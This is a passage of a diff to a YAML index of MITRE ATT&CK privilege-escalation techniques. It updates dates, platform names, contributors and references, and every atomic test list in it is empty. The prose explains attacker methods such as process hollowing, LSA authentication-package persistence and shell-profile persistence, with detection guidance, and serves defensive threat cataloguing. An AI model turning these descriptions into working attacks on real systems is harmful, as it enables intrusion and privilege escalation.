       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.006
     atomic_tests: []
   T1574:
@@ -20762,7 +21073,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1543.005:
     technique:
@@ -20836,11 +21146,10 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:09:46.024Z'
       name: Valid Accounts
       description: |-
         Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -20857,7 +21166,6 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
-      x_mitre_attack_spec_version: 3.1.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -20867,7 +21175,7 @@ privilege-escalation:
       - Netskope
       - Mark Wee
       - Praetorian
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -20876,19 +21184,17 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -20936,11 +21242,12 @@ privilege-escalation:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1055.012:
     technique:
-      modified: '2023-08-11T21:37:00.009Z'
+      modified: '2024-09-12T15:11:45.602Z'
       name: 'Process Injection: Process Hollowing'
       description: "Adversaries may inject malicious code into suspended and hollowed
         processes in order to evade process-based defenses. Process hollowing is a
@@ -21008,23 +21315,22 @@ privilege-escalation:
           Retrieved December 7, 2017.'
         url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
       - source_name: Leitch Hollowing
-        description: Leitch, J. (n.d.). Process Hollowing. Retrieved November 12,
-          2014.
-        url: http://www.autosectools.com/process-hollowing.pdf
+        description: Leitch, J. (n.d.). Process Hollowing. Retrieved September 12,
+          2024.
+        url: https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf
       - source_name: Mandiant Endpoint Evading 2019
         description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
           the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
         url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1055.012
     atomic_tests: []
   T1068:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-04-07T17:13:54.168Z'
       name: Exploitation for Privilege Escalation
       description: |-
         Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
@@ -21087,11 +21393,10 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546:
     technique:
-      modified: '2024-03-01T15:49:15.588Z'
+      modified: '2024-10-15T15:57:00.731Z'
       name: Event Triggered Execution
       description: "Adversaries may establish persistence and/or elevate privileges
         using system mechanisms that trigger execution based on specific events. Various
@@ -21144,8 +21449,8 @@ privilege-escalation:
       - Windows
       - SaaS
       - IaaS
-      - Office 365
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'WMI: WMI Creation'
@@ -21193,78 +21498,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546
     atomic_tests: []
   T1546.004:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Robert Wilson
-      - Tony Lambert, Red Canary
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
-      type: attack-pattern
-      created: '2020-01-24T14:13:45.936Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1546.004
-        url: https://attack.mitre.org/techniques/T1546/004
-      - source_name: intezer-kaiji-malware
-        url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
-        description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
-          turning to Golang. Retrieved December 17, 2020.'
-      - source_name: bencane blog bashrc
-        url: https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
-        description: Benjamin Cane. (2013, September 16). Understanding a little more
-          about /etc/profile and /etc/bashrc. Retrieved February 25, 2021.
-      - source_name: anomali-rocke-tactics
-        url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
-        description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
-          Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
-          December 17, 2020.
-      - source_name: Linux manual bash invocation
-        url: https://wiki.archlinux.org/index.php/Bash#Invocation
-        description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
-      - source_name: Tsunami
-        url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
-        description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
-          Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
-      - source_name: anomali-linux-rabbit
-        url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
-        description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
-          Malware Out of a Hat. Retrieved December 17, 2020.
-      - source_name: Magento
-        url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
-        description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
-          Vector. Retrieved December 17, 2020.
-      - source_name: ScriptingOSX zsh
-        url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
-        description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
-          Files. Retrieved February 25, 2021.'
-      - source_name: PersistentJXA_leopitt
-        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
-        description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
-          for macOS. Retrieved January 11, 2021.
-      - source_name: code_persistence_zsh
-        url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
-        description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
-          Retrieved January 11, 2021.
-      - source_name: macOS MS office sandbox escape
-        url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
-        description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
-          Retrieved August 20, 2021.
-      - source_name: ESF_filemonitor
-        url: https://objective-see.com/blog/blog_0x48.html
-        description: Patrick Wardle. (2019, September 17). Writing a File Monitor
-          with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-25T15:02:24.143Z'
       name: 'Event Triggered Execution: .bash_profile .bashrc and .shrc'
       description: "Adversaries may establish persistence through executing malicious
         commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s
@@ -21312,6 +21550,10 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Robert Wilson
+      - Tony Lambert, Red Canary
+      x_mitre_deprecated: false
       x_mitre_detection: "While users may customize their shell profile files, there
         are only certain types of commands that typically appear in these files. Monitor
         for abnormal commands such as execution of unknown programs, opening network
@@ -21322,9 +21564,13 @@ privilege-escalation:
         events monitoring these specific files.(Citation: ESF_filemonitor) \n\nFor
         most Linux and macOS systems, a list of file paths for valid shell options
         available on a system are located in the <code>/etc/shells</code> file.\n"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
       x_mitre_version: '2.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'File: File Creation'
@@ -21333,8 +21579,67 @@ privilege-escalation:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
+      created: '2020-01-24T14:13:45.936Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1546/004
+        external_id: T1546.004
+      - source_name: anomali-linux-rabbit
+        description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
+          Malware Out of a Hat. Retrieved December 17, 2020.
+        url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
+      - source_name: anomali-rocke-tactics
+        description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
+          Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
+          December 17, 2020.
+        url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
+      - source_name: Linux manual bash invocation
+        description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
+        url: https://wiki.archlinux.org/index.php/Bash#Invocation
+      - source_name: ScriptingOSX zsh
+        description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
+          Files. Retrieved February 25, 2021.'
+        url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
+      - source_name: bencane blog bashrc
+        description: Benjamin Cane. (2013, September 16). Understanding a little more
+          about /etc/profile and /etc/bashrc. Retrieved September 25, 2024.
+        url: https://web.archive.org/web/20220316014323/http://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
+      - source_name: macOS MS office sandbox escape
+        description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
+          Retrieved August 20, 2021.
+        url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
+      - source_name: Magento
+        description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
+          Vector. Retrieved December 17, 2020.
+        url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
+      - source_name: Tsunami
+        description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
+          Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
+        url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
+      - source_name: PersistentJXA_leopitt
+        description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
+          for macOS. Retrieved January 11, 2021.
+        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+      - source_name: code_persistence_zsh
+        description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
+          Retrieved January 11, 2021.
+        url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
+      - source_name: ESF_filemonitor
+        description: Patrick Wardle. (2019, September 17). Writing a File Monitor
+          with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
+        url: https://objective-see.com/blog/blog_0x48.html
+      - source_name: intezer-kaiji-malware
+        description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
+          turning to Golang. Retrieved December 17, 2020.'
+        url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1546.004
     atomic_tests: []
   T1134.005:
@@ -21380,7 +21685,7 @@ privilege-escalation:
         description: Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November
           30, 2017.
         source_name: Microsoft DsAddSidHistory
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-02-09T15:49:58.414Z'
       name: 'Access Token Manipulation: SID-History Injection'
       description: |-
         Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
@@ -21405,13 +21710,11 @@ privilege-escalation:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1134.005
     atomic_tests: []
   T1548.004:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T16:35:18.492Z'
       name: Elevated Execution with Prompt
       description: "Adversaries may leverage the <code>AuthorizationExecuteWithPrivileges</code>
         API to escalate privileges by prompting the user for credentials.(Citation:
@@ -21491,7 +21794,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.002:
     technique:
@@ -21527,7 +21829,7 @@ privilege-escalation:
         Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)
 
         Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\</code> with the key value of <code>"Authentication Packages"=&lt;target binary&gt;</code>. The binary will then be executed by the system when the authentication packages are loaded.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:29:36.291Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Authentication Package
       x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys.
@@ -21550,12 +21852,11 @@ privilege-escalation:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.002
     atomic_tests: []
   T1546.015:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:34:29.402Z'
       name: 'Event Triggered Execution: Component Object Model Hijacking'
       description: "Adversaries may establish persistence by executing malicious content
         triggered by hijacked references to Component Object Model (COM) objects.
@@ -21633,12 +21934,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.015
     atomic_tests: []
   T1574.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:35.788Z'
       name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -21699,7 +21999,6 @@ privilege-escalation:
         url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.009
     atomic_tests: []
   T1037.005:
@@ -21743,7 +22042,7 @@ privilege-escalation:
         mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since
         StartupItems run during the bootup phase of macOS, they will run as the elevated
         root user."
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:43:21.560Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Initialization Scripts: Startup Items'
       x_mitre_detection: |-
@@ -21765,7 +22064,6 @@ privilege-escalation:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.005
     atomic_tests: []
   T1078.002:
@@ -21846,7 +22144,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.003:
     technique:
@@ -21869,7 +22166,7 @@ privilege-escalation:
         description: Daniel Petri. (2009, January 8). Setting up a Logon Script through
           Active Directory Users and Computers in Windows Server 2008. Retrieved November
           15, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T23:45:25.625Z'
       name: Network Logon Script
       description: "Adversaries may use network logon scripts automatically executed
         at logon initialization to establish persistence. Network logon scripts can
@@ -21899,12 +22196,10 @@ privilege-escalation:
       - 'File: File Modification'
       - 'Process: Process Creation'
       - 'File: File Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1546.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:33:45.568Z'
       name: 'Event Triggered Execution: AppInit DLLs'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by AppInit DLLs loaded into processes.
@@ -21989,7 +22284,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.010
     atomic_tests: []
   T1546.002:
@@ -22054,7 +22348,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.002
     atomic_tests: []
   T1543.001:
@@ -22129,7 +22422,7 @@ privilege-escalation:
         benign software. Launch Agents are created with user level privileges and
         execute with user level permissions.(Citation: OSX Malware Detection)(Citation:
         OceanLotus for OS X) "
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-21T16:13:00.598Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Create or Modify System Process: Launch Agent'
       x_mitre_detection: "Monitor Launch Agent creation through additional plist files
@@ -22157,7 +22450,6 @@ privilege-escalation:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.001
     atomic_tests: []
   T1055.009:
@@ -22188,7 +22480,7 @@ privilege-escalation:
         url: http://man7.org/linux/man-pages/man1/dd.1.html
         description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved
           February 21, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-06-20T22:25:55.331Z'
       name: Proc Memory
       description: "Adversaries may inject malicious code into processes via the /proc
         filesystem in order to evade process-based defenses as well as possibly elevate
@@ -22231,12 +22523,10 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Application control
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1546.016:
     technique:
-      modified: '2024-04-12T02:23:44.583Z'
+      modified: '2024-04-28T15:52:44.332Z'
       name: Installer Packages
       description: |-
         Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)
@@ -22253,7 +22543,7 @@ privilege-escalation:
         phase_name: persistence
       x_mitre_contributors:
       - Brandon Dalton @PartyD0lphin
-      - Alexander Rodchenko
+      - Rodchenko Aleksandr
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -22312,7 +22602,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.004:
     technique:
@@ -22394,12 +22683,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.004
     atomic_tests: []
   T1134:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.762Z'
       name: Access Token Manipulation
       description: |-
         Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
@@ -22496,7 +22784,6 @@ privilege-escalation:
         url: https://pentestlab.blog/2017/04/03/token-manipulation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1543.002:
     technique:
@@ -22610,7 +22897,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.002
     atomic_tests: []
   T1547.013:
@@ -22680,7 +22966,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.005:
     technique:
@@ -22708,7 +22993,7 @@ privilege-escalation:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:24:54.198Z'
       name: Thread Local Storage
       description: "Adversaries may inject malicious code into processes via thread
         local storage (TLS) callbacks in order to evade process-based defenses as
@@ -22752,8 +23037,6 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1547.007:
     technique:
@@ -22789,7 +23072,7 @@ privilege-escalation:
         Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named <code>com.apple.loginwindow.[UUID].plist</code> within the <code>~/Library/Preferences/ByHost</code> directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.
 
         Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the <code>com.apple.loginwindow.[UUID].plist</code> file to execute payloads when a user logs in.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T23:46:56.443Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Autostart Execution: Re-opened Applications'
       x_mitre_detection: Monitoring the specific plist files associated with reopening
@@ -22808,12 +23091,11 @@ privilege-escalation:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.007
     atomic_tests: []
   T1574.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.241Z'
       name: 'Hijack Execution Flow: DLL Side-Loading'
       description: |-
         Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -22863,12 +23145,11 @@ privilege-escalation:
         url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.002
     atomic_tests: []
   T1098.002:
     technique:
-      modified: '2024-01-03T15:46:06.706Z'
+      modified: '2024-10-15T15:37:25.303Z'
       name: 'Account Manipulation: Additional Email Delegate Permissions'
       description: "Adversaries may grant additional permission levels to maintain
         persistent access to an adversary-controlled email account. \n\nFor example,
@@ -22901,9 +23182,10 @@ privilege-escalation:
       x_mitre_contributors:
       - Microsoft Detection and Response Team (DART)
       - Mike Burns, Mandiant
-      - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
       - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
       - Arad Inbar, Fidelis Security
+      - Nilesh Dherange (Gurucul)
+      - Naveen Vijayaraghavan
       x_mitre_deprecated: false
       x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
         permissions changes that may indicate excessively broad permissions being
@@ -22920,9 +23202,8 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '2.1'
+      - Office Suite
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Group: Group Modification'
       - 'Application Log: Application Log Content'
@@ -22968,38 +23249,19 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.002
     atomic_tests: []
   T1548.006:
     technique:
